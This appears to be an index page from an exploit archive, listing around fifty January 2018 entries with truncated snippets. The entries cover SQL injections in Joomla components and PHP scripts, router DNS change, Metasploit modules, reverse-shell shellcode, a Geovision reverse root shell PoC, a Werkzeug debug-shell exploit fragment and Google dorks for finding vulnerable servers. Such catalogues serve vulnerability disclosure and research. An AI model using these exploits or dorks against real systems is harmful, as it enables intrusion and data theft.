FiberHome AN5506 - Remote DNS Change
FIBERHOME AN5506 Unauthenticated Remote DNS Change Vulnerability Software Version RP2617 Device Model AN5506-04-F Vendor Homepage: www.fiberhome.com/ Date: 01/02/2018 Exploit Author: r0ots3c http://wandoelmo.com.br https://www.facebook.com/wsec.info Description: Vulnerability exists in web...
Joomla! Component JMS Music 1.1.1 - SQL Injection
Exploit Title: Joomla! Component JMS Music 1.1.1 - SQL Injection Dork: N/A Date: 01.02.2018 Vendor Homepage: https://www.joommasters.com/ Software Link: https://extensions.joomla.org/extensions/extension/multimedia/multimedia-players/jms-music/ Version: 1.1.1 Category: Webapps Tested on:...
Oracle Hospitality Simphony (MICROS) 2.7 < 2.9 - Directory Traversal
Exploit Title: Oracle Hospitality Simphony MICROS directory traversal Date: 30.01.2018 Exploit Author: Dmitry Chastuhin https://twitter.com/chipik Vendor Homepage: http://www.oracle.com/ Version: 2.7, 2.8 and 2.9 Tested on: Win, nix CVE : CVE-2018-2636 !/usr/bin/env python...
Microsoft Windows Subsystem for Linux - 'execve()' Local Privilege Escalation
define GNUSOURCE include include include include include include include include include include include include include include include define RINGSIZE 0x2000000 define PIPESIZE 0xb8 define PTRSIZE 0x8 define STRHDRSIZE 0x18 define LEAKOFFSET 0x68 define SHELLCODEOFFSET 0x200 define...
Joomla! Component Jimtawl 2.1.6 - Arbitrary File Upload
Exploit Title: Joomla! Component Jimtawl 2.2.5 - Arbitrary File Upload Dork: N/A Date: 01.02.2018 Vendor Homepage: http://janguo.de/ Software Link: https://extensions.joomla.org/extensions/extension/multimedia/streaming-a-broadcasting/jimtawl/ Software Download:...
Advance Loan Management System - 'id' SQL Injection
Exploit Title: Advance Loan Management System - 'id' SQL Injection Date: 2018-01-31 Exploit Author: 8bitsec Vendor Homepage: https://codecanyon.net/ Software Link: https://codecanyon.net/item/advance-loan-management-system-with-savings-system-and-sms-notification/21283070 Version: 1.0 Tested on:...
Joomla! Component JEXTN Classified 1.0.0 - 'sid' SQL Injection
Exploit Title: Joomla! Component JEXTN Classified 1.0.0 - SQL Injection Dork: N/A Date: 01.02.2018 Vendor Homepage: http://jextn.com/ Software Link: https://extensions.joomla.org/extensions/extension/ads-a-affiliates/classified-ads/jextn-classified/ Version: 1.0.0 Category: Webapps Tested on:...
Joomla! Component JEXTN Membership 3.1.0 - 'usr_plan' SQL Injection
...
IPSwitch MOVEit 8.1 < 9.4 - Cross-Site Scripting
Exploit Title: IPSwitch MoveIt Stored Cross Site Scripting XSS Date: 1-31-2017 Software Link: https://www.ipswitch.com/moveit Affected Version: 8.1-9.4 only confirmed on 8.1 but other versions prior to 9.5 may also be vulnerable Exploit Author: 1N3@CrowdShield - https://crowdshield.com Early...
Fancy Clone Script - 'search_browse_product' SQL Injection
Exploit Title: Fancy Clone Script - 'search_browse_product' SQL Injection Date: 2018-01-31 Exploit Author: 8bitsec Vendor Homepage: https://pofitec.com/ Software Link: https://pofitec.com/fancy-clone-script.php Version: 1.0 Tested on: Kali Linux 2.0 | Mac OS 10.13.3 Contac...
Event Manager 1.0 - SQL Injection
Exploit Title: Event Manager PHP Script 1.0 - SQL Injection Dork: N/A Date: 01.02.2018 Vendor Homepage: http://ezcode.pt/ Software Link: https://codecanyon.net/item/eventmanager-php-script-admin-panel/21280741 Version: 1.0 Category: Webapps Tested on: WiN7x64/KaLiLinuXx64 CVE: N/A Exploit Author:...
Geovision Inc. IP Camera/Video/Access Control - Multiple Remote Command Execution / Stack Overflow / Double Free / Unauthorized Access
STX Subject: Geovision Inc. IP Camera/Video/Access Control Multiple Remote Command Execution - Multiple Stack Overflow - Double free - Unauthorized Access Attack vector: Remote Authentication: Anonymous no credentials needed Researcher: bashis November 2017 PoC: https://github.com/mcw0/PoC Python...
BMC Server Automation RSCD Agent - NSH Remote Command Execution (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'BMC Server Automation RSCD Agent NSH Remote ' \ 'Command Execution', 'Description' = %q This module exploits a weak access control check in the B...
Sync Breeze Enterprise 10.4.18 - Remote Buffer Overflow (SEH)
Exploit Title: Sync Breeze Enterprise v10.4.18 Server - Unauthenticated Remote Buffer Overflow SEH Date: 29/01/2018 Exploit Author: Daniel Teixeira Vendor Homepage: http://www.syncbreeze.com Software Link: http://www.syncbreeze.com/setups/syncbreezeentsetupv10.4.18.exe Version: 10.4.18 Tested on:...
Geovision Inc. IP Camera & Video - Remote Command Execution
!/usr/bin/env python2.7 SOF Geovision Inc. IP Camera & Video Server Remote Command Execution PoC Researcher: bashis November 2017 1. Pop stunnel TLSv1 reverse root shell Local listener: 'ncat -vlp --ssl'; Verified w/ v7.60 2. Dump all settings of remote IPC with Login/Passwd in cleartext Using: -...
WebKit - 'detachWrapper' Use-After-Free
::detachWrapper /Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x8664+0xfe2b9f...
WebKit - 'WebCore::FrameView::clientToLayoutViewportPoint' Use-After-Free
function jsfuzzer var b = document.createElement"body"; a.appendb; ta.autofocus = true; var iframe = document.createElement"iframe"; b.appendChildiframe; li.appendChilddd; iframe.contentDocument.caretRangeFromPoint; function eventhandler ta.insertAdjacentElement"beforeBegin",a; ::operator...
Hotspot Shield - Information Disclosure
Vulnerability Summary The following advisory describes an information disclosure found in Hotspot Shield. Hotspot Shield “provides secure and private access to a free and open internet. Enabling access to social networks, sports, audio and video streaming, news, dating, gaming wherever you are.”...
Joomla! Component Picture Calendar for Joomla! 3.1.4 - Directory Traversal
Exploit Title: Joomla! Component Picture Calendar for Joomla 3.1.4 - Directory Traversal Dork: N/A Date: 30.01.2018 Vendor Homepage: http://www.joomlacalendars.com/ Software Link: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/picture-calendar-for-joomla/ Version:...
LabF nfsAxe 3.7 TFTP Client - Local Buffer Overflow
!/usr/bin/python Exploit Author: Miguel Mendez Z Exploit Title: LabF nfsAxe v3.7 - TFTP "Input Directory" Local Buffer Overflow Date: 29-01-2018 Software: LabF nfsAxe Version: v3.7 Vendor Homepage: http://www.labf.com Software Link: http://www.labf.com/download/nfsaxe.exe Tested on: Windows 7 x86...
BMC BladeLogic RSCD Agent 8.3.00.64 - Windows Users Disclosure
Exploit Title: BMC BladeLogic RSCD agent get Windows users Filename: BMCwinUsers.py Github: https://github.com/bao7uo/bmcbladelogic Date: 2018-01-27 Exploit Author: Paul Taylor / Foregenix Ltd Website: http://www.foregenix.com/blog Version: BMC RSCD agent 8.3.00.64 CVE: CVE-2016-5063 Vendor...
Joomla! Component Visual Calendar 3.1.3 - 'id' SQL Injection
Exploit Title: Joomla! Component Visual Calendar 3.1.3 - SQL Injection Dork: N/A Date: 30.01.2018 Vendor Homepage: http://www.joomlacalendars.com/ Software Link: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/visual-calendar/ Version: 3.1.3 Category: Webapps Tested o...
Advantech WebAccess < 8.3 - SQL Injection
!/usr/bin/python2.7 Exploit Title: Advantech WebAccess BWSCADARest Login Method SQL Injection Authentication Bypass Vulnerability Date: 01-13-2018 Exploit Author: Chris Lyne @lynerc Vendor Homepage: www.advantech.com Software Link:...
Joomla! Component CP Event Calendar 3.0.1 - 'id' SQL Injection
Exploit Title: Joomla! Component CP Event Calendar 3.0.1 - SQL Injection Dork: N/A Date: 30.01.2018 Vendor Homepage: http://www.joomlacalendars.com/ Software Link: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/cp-event-calendar/ Version: 3.0.1 Category: Webapps Test...
HPE iMC 7.3 - RMI Java Deserialization
Exploit Title: HPE iMC 7.3 Java RMI Registry Deserialization RCE Vulnerability Date: 01-28-2018 Exploit Author: Chris Lyne @lynerc Vendor Homepage: www.hpe.com Software Link:...
System Shield 5.0.0.136 - Privilege Escalation
/ Exploit Title - System Shield AntiVirus & AntiSpyware Arbitrary Write Privilege Escalation Date - 29th January 2018 Discovered by - Parvez Anwar @parvezghh Vendor Homepage - http://www.iolo.com/ Tested Version - 5.0.0.136 Driver Version - 5.4.11.1 - amp.sys Tested on OS - 64bit Windows 7 and...
systemd (systemd-tmpfiles) < 236 - 'fs.protected_hardlinks=0' Local Privilege Escalation
Product: systemd systemd-tmpfiles Versions-affected: 236 and earlier Author: Michael Orlitzky Fixed-in: commit 5579f85 , version 237 Bug-report: https://github.com/systemd/systemd/issues/7736 Acknowledgments: Lennart Poettering who, instead of calling me an idiot for not realizing that systemd...
Arq 5.10 - Local Privilege Escalation (1)
!/usr/bin/env ruby Arq USE AT YOUR OWN RISK - THIS WILL OVERWRITE THE ROOT USER'S CRONTAB! $binarytarget = "/tmp/arq510exp" class Arq510PrivEsc def i...
Arq 5.10 - Local Privilege Escalation (2)
!/bin/bash Arq payload.sh EOF !/bin/bash rm -rf $HOME/.arq510privescexp while : do pid=\ps auxwww |grep '$app/Contents/MacOS/Arq' |grep -v grep |xargs \ |cut -d ' ' -f2\ if "$pid" != "" ; then ki...
macOS - 'sysctl_vfs_generic_conf' Stack Leak Through Struct Padding
/ The sysctls vfs.generic.conf. are handled by sysctlvfsgenericconf, which is implemented as follows: static int sysctlvfsgenericconf SYSCTLHANDLERARGS int name, namelen; struct vfstable vfsp; struct vfsconf vfsc; voidoidp; name = arg1; namelen = arg2; check for namelen==1 mountlistlock; for vfsp...
iBall WRA150N - Multiple Vulnerabilities
Vulnerabilities summary The following advisory describes two 2 vulnerabilities found in iB-WRA150N devices, firmware 1.2.6 build 110401 Rel.47776n. iB-WRA150N is “a powerful solution to Internet connectivity at home, small offices and work stations. The key is if you are using an ADSL2+ connectio...
Oracle WebLogic - wls-wsat Component Deserialization Remote Code Execution (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Oracle WebLogic wls-wsat Component Deserialization RCE', 'Description' = %q The Oracle WebLogic WLS WSAT Component is vulnerable to a XML...
PACSOne Server 6.6.2 DICOM Web Viewer - Directory Traversal
Exploit Title: PACSOne Server 6.6.2 DICOM Web Viewer Directory Traversal / Local File Inclusion Date: 08/14/2017 Software Link: http://www.pacsone.net/download.htm Google Dork: inurl:pacs/login.php inurl:pacsone/login.php inurl:pacsone filetype:php home inurl:pacsone filetype:php login Version:...
Artifex MuJS 1.0.2 - Denial of Service
Hello, I want to submit the following bug: The jsstrtod function in jsdtoa.c in Artifex MuJS through 1.0.2 has an integer overflow because of incorrect exponent validation. Exploit Title: Integer signedness error leading to Out-of-bounds read that causes crash Date: 2018-01-24 Exploit Author:...
Werkzeug - 'Debug Shell' Command Execution
!/usr/bin/env python import requests import sys import re import urllib usage : python exploit.py 192.168.56.101 5000 192.168.56.102 4422 if lensys.argv != 5: print "USAGE: python %s " % sys.argv0 sys.exit-1 response = requests.get'http://%s:%s/console' % sys.argv1,sys.argv2 if "Werkzeug " not in...
Linux/ARM - Reverse TCP (192.168.1.1:4444/TCP) Shell (/bin/sh)+ Null-Free Shellcode (80 bytes)
Linux/ARM - Reverse TCP 192.168.1.1:4444/TCP Shell /bin/sh+ Null-Free Shellcode 80 bytes. Shellcode exploit for ARM platform / Title: Linux/ARM - Reverse Shell TCP /bin/sh. Null free shellcode 80 bytes Date: 2018-01-25 Tested: armv7l Raspberry Pi v3 Author: rtmcx - twitter: @rtmcx / .section .tex...
Linux/x86 - Egghunter Shellcode (12 Bytes)
Linux/x86 - Egghunter Shellcode 12 Bytes. Shellcode exploit for Linuxx86 platform / Title: Linux/x86 - EggHunter Shellcode 12 Bytes Description: Smallest Null-Free Egg Hunter Shellcode - 12 Bytes Date : 14/Jan/2018 Author: Nipun Jaswal @nipunjaswal ; SLAE-1080 Details: 1. Works with an executable...
Trend Micro Threat Discovery Appliance 2.6.1062r1 - 'dlp_policy_upload.cgi' Remote Code Execution
!/usr/local/bin/python """ Trend Micro Threat Discovery Appliance /opt/TrendMicro/MinorityReport/bin/ Then, all we do is create /engptnstores/prod/sensorSDK/data/si/dlpkill.sh with malicious code and get it executed... Notes: ====== - For this particular PoC, all I did was exec a bind shell using...
Multilanguage Real Estate MLM Script 3.0 - 'srch' SQL Injection
Exploit Title: Multilanguage Real Estate MLM Script = 3.0 - SQL Injection Dork: N/A Date: 27.01.2018 Vendor Homepage: http://www.phpscriptsmall.com/ Software Link: http://www.exclusivescript.com/product/y2OP4658391/php-scripts/multilanguage-real-estate-mlm-script Version: = 3.0 Category: Webapps...
Artifex MuJS 1.0.2 - Integer Overflow
Exploit Title: DoS caused by the interactive call between two functions Date: 2018-01-16 Exploit Author: Andrea Sindoni - @invictus1306 Vendor: Artifex https://www.artifex.com/ Software Link: https://github.com/ccxvii/mujs Version: Mujs - 228719d087aa5e27dcd8627c4acf7273476bdbca Tested on: Linux...
Sony Playstation 3 (PS3) 4.82 - 'Jailbreak' (ROP)
EDB Note http://ps3xploit.com/help/dumper.html EDB Download https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44820.zip Dumper Help Warning: Due to the lack of proper checks after exiting the ROP chain, it is possible in some cases to obtain a success message despit...
Netis WF2419 Router - Cross-Site Request Forgery
Exploit Title: Netis-WF2419 Router Cross-Site Request Forgery CSRF Date: 28/01/2018 Exploit Author: Sajibe Kanti Author Contact: https://twitter.com/@sajibekantibd Vendor Homepage: http://www.netis-systems.com/ Version: Netis-WF2419, V2.2.36123 Tested on: Windows 10 Technical Details & Descriptio...
TSiteBuilder 1.0 - SQL Injection
Exploit Title: TSiteBuilder 1.0 - SQL Injection Dork: N/A Date: 27.01.2018 Vendor Homepage: http://www.datacomponents.net/ Software Link: http://www.datacomponents.net/products/website/ Version: 1.0 Category: Webapps Tested on: WiN7x64/KaLiLinuXx64 CVE: N/A Exploit Author: Ihsan Sencan Author Web...
Joomla! Component Jtag Members Directory 5.3.7 - Arbitrary File Download
Exploit Title: Joomla! Component Jtag Members Directory 5.3.7 - Arbitrary File Download Dork: N/A Date: 27.01.2018 Vendor Homepage: https://joomlatag.com/ Software Link: https://extensions.joomla.org/extensions/extension/clients-a-communities/members-lists/jtag-members-directory/ Version: 5.3.7...
Nexpose < 6.4.66 - Cross-Site Request Forgery
Exploit Title: Cross Site Request Forgery at Nexpose Automated Actions Release Date: 2017-12-13 Exploit Author: Shwetabh Vishnoi Link: https://www.linkedin.com/in/shwetabhvishnoi Vendor Homepage: https://www.rapid7.com/ Software Link: https://www.rapid7.com/products/nexpose/download/ Tested on:...
KeystoneJS < 4.0.0-beta.7 - Cross-Site Request Forgery
Exploit Title: Application wide CSRF Bypass Date: Sep, 2017 Exploit Author: Saurabh Banawar Vendor Homepage: http://keystonejs.com/ Software Link: https://github.com/keystonejs/keystone Version: 4.0.0 Tested on: Windows 8.1 CVE : 2017-16570 Link: https://vuldb.com/?id.109170 Exploit:...
Buddy Zone 2.9.9 - SQL Injection
Exploit Title: Vastal I-Tech Facebook Clone 2.9.9 - SQL Injection Dork: N/A Date: 27.01.2018 Vendor Homepage: http://vastal.com/ Software Link: http://vastal.com/buddy-zone-social-networking-script.html Version: 2.9.9 Category: Webapps Tested on: WiN7x64/KaLiLinuXx64 CVE: N/A Exploit Author: Ihsa...
Hot Scripts Clone - 'subctid' SQL Injection
Exploit Title: Hot Scripts Clone Script 1.0 - SQL Injection Dork: N/A Date: 27.01.2018 Vendor Homepage: http://www.phpscriptsmall.com/ Software Link: http://www.exclusivescript.com/product/M72g4502563/php-scripts/hot-scripts-clone-:-script-classified Version: 1.0 Category: Webapps Tested on:...
Task Rabbit Clone 1.0 - 'id' SQL Injection
Exploit Title: Task Rabbit Clone 1.0 - SQL Injection Dork: N/A Date: 27.01.2018 Vendor Homepage: http://migrateshop.com/ Software Link: http://migrateshop.com/product/task-rabbit-clone-php-script/ Version: 1.0 Category: Webapps Tested on: WiN7x64/KaLiLinuXx64 CVE: N/A Exploit Author: Ihsan Sencan...
PACSOne Server 6.6.2 DICOM Web Viewer - SQL Injection
Exploit Title: PACSOne Server 6.6.2 DICOM Web Viewer SQL Injection Date: 08/14/2017 Software Link: http://www.pacsone.net/download.htm Version: PACSOne Server 6.6.2 Exploit Author: Carlos Avila Google Dork: inurl:pacs/login.php inurl:pacsone/login.php inurl:pacsone filetype:php home inurl:pacsone...